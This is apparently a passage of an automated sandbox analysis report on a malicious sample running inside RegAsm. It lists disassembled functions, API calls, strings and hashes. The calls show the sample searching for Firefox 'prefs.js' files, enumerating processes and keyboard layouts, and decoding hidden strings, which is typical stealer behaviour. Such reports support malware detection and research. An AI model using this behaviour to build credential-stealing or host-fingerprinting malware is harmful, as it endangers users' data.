Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: "$\*.*
API String ID: 1275501236-2874818444
Opcode ID: 255d9d8282bf5e4dbcdd36524b767799cb1271ec614b13902a6002eddc377c5c
Instruction ID: 9926ff9045508f477830b481b77a64aca997a954f45febdae2976da7a71226b1
Opcode Fuzzy Hash: 255d9d8282bf5e4dbcdd36524b767799cb1271ec614b13902a6002eddc377c5c
Instruction Fuzzy Hash: 7712437180024CEADF15EBA5C955FEEBB78AF14308F10409EE54563182EFB81BD8DB66

Function 0040BFA5 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 311fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BFAA

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FF0,?,?,00426CC3,?,00000000,?), ref: 0040C029
StrCmpCA.SHLWAPI(?,00426FF4,?,00000000,?), ref: 0040C04D
StrCmpCA.SHLWAPI(?,00426FF8,?,00000000,?), ref: 0040C067
StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FFC,?,?,00426CCE,?,00000000,?), ref: 0040C103

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

FindNextFileA.KERNEL32(?,?,?,00000000,?), ref: 0040C38C
FindClose.KERNEL32(?,?,00000000,?), ref: 0040C39D

Strings

prefs.js, xrefs: 0040C0F7

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 3307916976-3783873740
Opcode ID: 789dc41387a1fe6a376551e994a5d609ff65de9aa38e4cb86fd8e6083b52128e
Instruction ID: 01eb8a24a4fd62ce8056d050d5c529ebb36418f7550fd7503c133593a2a18e65
Opcode Fuzzy Hash: 789dc41387a1fe6a376551e994a5d609ff65de9aa38e4cb86fd8e6083b52128e
Instruction Fuzzy Hash: 0AD1AB70D00288EEDF14EBB5D955BDD7BB46F15304F10419EE449A32C2DBB81B88DBA6

Function 1B485940 Relevance: 12.4, APIs: 8, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97d35c5f141cc8a6074bca01acf331152ff8d0ece27de66906cf5aa024cdc2e
Instruction ID: 5157ce3882d12b3305930025c06cbc9969822595c4001d5da2cbc5ffde7c4326
Opcode Fuzzy Hash: b97d35c5f141cc8a6074bca01acf331152ff8d0ece27de66906cf5aa024cdc2e
Instruction Fuzzy Hash: B5C16AB6E583414FEB009A58CC827DB7792EF91310FD8852EF48587356E229E589CBC2

Function 0041098E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410993

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

GetKeyboardLayoutList.USER32(00000000,00000000,00427337,00000001,?,00000000), ref: 004109C5
LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 004109D3
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 004109DE
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 00410A08

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

LocalFree.KERNEL32(?), ref: 00410AAC

Strings

/ , xrefs: 00410A16

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 2868853201-4001269591
Opcode ID: 55b75b4692d93c972f648d1b1c3b3da9daec219a99e7ad38c0c0614cf6f36e4d
Instruction ID: 4d234ebf4c820838d639ea6207ddc5df721d0be5534262355a6bb8010d212cce
Opcode Fuzzy Hash: 55b75b4692d93c972f648d1b1c3b3da9daec219a99e7ad38c0c0614cf6f36e4d
Instruction Fuzzy Hash: CD315E71901218EEDB10DFE5C885AEEBBB9FF49344F10406EEA05A7241D7785AC4CB64

Function 1B407810 Relevance: 10.9, APIs: 7, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 853f51dac1718588ce94d0178d62698d87aa62d9285e4cf84b6dac7c88fca293
Instruction ID: 087f8f0ff3708fdbf52cf654f7a171e0088d07f8805994abbabae34e9ea39840
Opcode Fuzzy Hash: 853f51dac1718588ce94d0178d62698d87aa62d9285e4cf84b6dac7c88fca293
Instruction Fuzzy Hash: B1E102719083419FDB01DF25C881AEBB7E8BF85644F048A6DF885A7211EB35E855CBA3

Function 1B4751D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B475264
, xrefs: 1B475334

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: 28c8ec4cfdf050ae4d99304e00d3bad78b65f108e42cbd09566d1e73fd1c9c32
Instruction ID: b3bc2031768c56a75bc87a895e0968774388971b79d8862ca97042b93cad1625
Opcode Fuzzy Hash: 28c8ec4cfdf050ae4d99304e00d3bad78b65f108e42cbd09566d1e73fd1c9c32
Instruction Fuzzy Hash: 96416DB5A04341AFDB00EF29DC80B9AB7E9FF88304F454529F984AB351D771E951CB92

Function 1B4AD610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 5abdc19b89045a8dbf5126484f4fda41ce8a508b59cf4192e197c8846b40bc37
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: C441D2B5600702AFCB009F69DC81A9BB7E8FF55710F40862CF89986250E772F915CBA2

Function 1B3E4820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4eaa7338324acd17924b4386a1d9ff0434e11dc6a72afb93c5bb57063d5f729
Instruction ID: 67d6af180f6d507621f327e348582773ee52eaf8c0eeed38953fc24cb7d286ff
Opcode Fuzzy Hash: e4eaa7338324acd17924b4386a1d9ff0434e11dc6a72afb93c5bb57063d5f729
Instruction Fuzzy Hash: FAB1B1B5904742AFD700CF26C885B9BB7F8BF89314F008B1EF49596240E775E5A4CBA6

Function 1B3E5C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: adf4105f10cb51fb3b7ab8579ab0031e9fdf4bd7bca1de90928a738c1b2c8afe
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: B641E2B66043119FDB14DF18D884AE7B7E4FF88210F12456AE9818B691E772F864CB60

Function 1B469090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc22dcb981639f74e0add2b04a9739c12dbbea8b371011a3019a5d8133e37cd
Instruction ID: 17d795641224fcf469e8650767ecee60166e72dca26bd01214458fef3909f1cc
Opcode Fuzzy Hash: cbc22dcb981639f74e0add2b04a9739c12dbbea8b371011a3019a5d8133e37cd
Instruction Fuzzy Hash: 1231D179A002009FE710CF29D885EE6B3E4EF88365B5485B9E9468B362D772FC61CB50

Function 00408E1E Relevance: 9.1, APIs: 6, Instructions: 83stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408E45
lstrlenA.KERNEL32(0040914A,00000001,?,00000014,00000000,00000000,?,0040914A,00000014), ref: 00408E5F
CryptStringToBinaryA.CRYPT32(0040914A,00000000,?,0040914A,00000014), ref: 00408E69
memcpy.MSVCRT ref: 00408ED1
lstrcat.KERNEL32(00426C63,00426C67), ref: 00408EF8
lstrcat.KERNEL32(00426C63,00426C6A), ref: 00408F10

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 8b2f21085cbeaac7fef55eb4047e8c4f3a8608216de3d265f151c5cb625bb173
Instruction ID: 56fa833f9a71d52e5edb7e71e323dd3c5d338d4f82ec4d47588eef9552056639
Opcode Fuzzy Hash: 8b2f21085cbeaac7fef55eb4047e8c4f3a8608216de3d265f151c5cb625bb173
Instruction Fuzzy Hash: BF214BB590011EEFDB009FA4DE859EE7BBDEF04344F10047AF505F2151EB389A859BA9

Function 00411E67 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411E6C
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411E92
Process32First.KERNEL32(00000000,00000128), ref: 00411EA2
Process32Next.KERNEL32(00000000,00000128), ref: 00411EB4
StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 00411EC8
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411EDB

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
String ID:
API String ID: 186290926-0
Opcode ID: f951c91746edae96e9d7e2e1bc2c6a67c45b135ddad437d7048d4fafa72d1428
Instruction ID: 686ec41142f659df7ef5011325dd3e27d51c857dd64da32708b992819a3548ba
Opcode Fuzzy Hash: f951c91746edae96e9d7e2e1bc2c6a67c45b135ddad437d7048d4fafa72d1428
Instruction Fuzzy Hash: B2017175900618ABCB219F95DD48ADEBBB9EF82300F104057F505E2210D7785F81CFA5

Function 1B451FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 1B452001

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 7995000d544163490cf3890ee77144dcc71315badf38d0bbbd3c7e7d0804e26b
Instruction ID: 70a59582368aa23bbcec6cb55434a76d5159df3fd1f6a3cd81a87bdfd23404be
Opcode Fuzzy Hash: 7995000d544163490cf3890ee77144dcc71315badf38d0bbbd3c7e7d0804e26b
Instruction Fuzzy Hash: 1021F1B5901705AFEB10AF69DC81F96B7AEEF44714F448419FA84A7221D372F860CBA1

Function 1B5C3300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,1B5C3688,?,00000000), ref: 1B5C3399
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,1B5C3688,?,00000000), ref: 1B5C33C2
GetACP.KERNEL32(?,?,1B5C3688,?,00000000), ref: 1B5C33D7

Strings

OCP, xrefs: 1B5C3354
ACP, xrefs: 1B5C331E

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: afd8ef9feaa05f8fe7a3481378f775bd726e0e8553cc04ba75f167d68be0c02e
Instruction ID: 967ae2cf384712f4cd9f024ae4470541e35804dd7d7f4c53e98f3295517c4361
Opcode Fuzzy Hash: afd8ef9feaa05f8fe7a3481378f775bd726e0e8553cc04ba75f167d68be0c02e
Instruction Fuzzy Hash: D8218332B00109A6F7158F95C985ACB77AFEF50E64B564564E949DB206EF32DB40C390

Function 00406D7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
